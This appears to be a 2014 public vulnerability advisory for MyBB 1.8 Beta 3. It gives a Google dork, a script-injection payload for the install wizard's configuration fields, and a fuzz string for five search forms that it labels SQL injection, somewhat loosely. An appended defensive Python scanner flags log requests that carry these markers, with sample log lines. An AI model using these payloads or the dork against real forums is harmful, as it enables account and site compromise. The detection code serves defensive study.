# Title: MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection
# Google Dork: intext:"Powered By MyBB"
# Date: 15.08.2014
# Author: DemoLisH
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://www.mybb.com/downloads
# Version: 1.8 - Beta 3
# Contact: onur@b3yaz.org
***************************************************
a) Cross Site Scripting in Installation Wizard ( Board Configuration )
Fill Forum Name, Website Name and Website URL with your code, for example "><script>alert('DemoLisH')</script> (at localhost/install/index.php).
Now finish the setup and go to the homepage.
b) SQL Injection in Private Messages ( User CP )
Go to -> Inbox, for example: localhost/private.php
Search for the following keywords: <foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
c) SQL Injection in Showthread
Go to -> Show Thread, for example: localhost/showthread.php?tid=1
Search for the following keywords: <foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
d) SQL Injection in Search
Go to -> Search, for example: localhost/search.php
Search for the following keywords: <foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
e) SQL Injection in Help Documents
Go to -> Help Documents, for example: localhost/misc.php?action=help
Search for the following keywords: <foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
f) SQL Injection in Forum Display
Go to -> Forum Display, for example: localhost/forumdisplay.php?fid=2
Enter the following keywords in "Search this Forum": <foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
***************************************************
[~#~] Thanks To: Mugair, X-X-X, PoseidonKairos, DexmoD, Micky and all TurkeySecurity Members.
# C5385FB67D35D5E0 1337day.com [2014-10-25] C072C10B3BF9C4C7 #
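Added example, not part of the advisory: a small Python scanner that flags web-server requests to the MyBB endpoints listed above whose query parameters carry markers from the advisory's keyword string, after undoing URL encoding. It assumes Combined-log-format access logs with MyBB at the web root; the sample lines are constructed, and because POST bodies (the install wizard and private-message forms) are not in access logs, only query-string probes are visible this way.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Endpoints named in the advisory (assumed mounted at the web root).
WATCHED_PATHS = {"/install/index.php", "/private.php", "/showthread.php",
                 "/search.php", "/misc.php", "/forumdisplay.php"}
# Markers derived from the advisory's keyword string; word-bounded where a bare
# substring would match ordinary text (e.g. "prompt" inside a normal search).
MARKER_RE = re.compile(r"<script|<h1|alert\s*\(|\bprompt\s*\(|\bonload\b|\\x41", re.I)
# Combined log format (assumed); only client IP and request target are used.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) \S+" \d{3}')

def decode_fully(value, rounds=3):
    """Strip up to `rounds` layers of URL encoding (%253C -> %3C -> <)."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(target):
    """Return (param, once-decoded value) pairs that carry a marker."""
    parts = urlsplit(target)
    if parts.path not in WATCHED_PATHS:
        return []
    return [(key, val) for key, val in parse_qsl(parts.query, keep_blank_values=True)
            if MARKER_RE.search(decode_fully(val))]

def scan_log(lines):
    """Return [(ip, path, hits), ...] for every flagged request line."""
    flagged = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            hits = suspicious_params(m["target"])
            if hits:
                flagged.append((m["ip"], urlsplit(m["target"]).path, hits))
    return flagged

# Constructed sample: benign search, encoded probe, double-encoded probe on the
# forum search, and a probe against a path the advisory does not name.
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Aug/2014:10:00:01 +0000] "GET /search.php?keywords=mybb+themes HTTP/1.1" 200 5120',
    '203.0.113.7 - - [15/Aug/2014:10:00:02 +0000] "GET /search.php?keywords=%3Cscript%3Ealert%28bar%29 HTTP/1.1" 200 4096',
    '203.0.113.7 - - [15/Aug/2014:10:00:03 +0000] "GET /forumdisplay.php?fid=2&keywords=%253Cscript%253E HTTP/1.1" 200 4096',
    '203.0.113.9 - - [15/Aug/2014:10:00:04 +0000] "GET /index.php?q=%3Cscript%3E HTTP/1.1" 200 1024',
]
```

Run `scan_log(SAMPLE_LOG)` to get the two flagged probe lines; the double-encoded one is caught because `decode_fully` peels the extra layer that a single `parse_qsl` decode leaves behind.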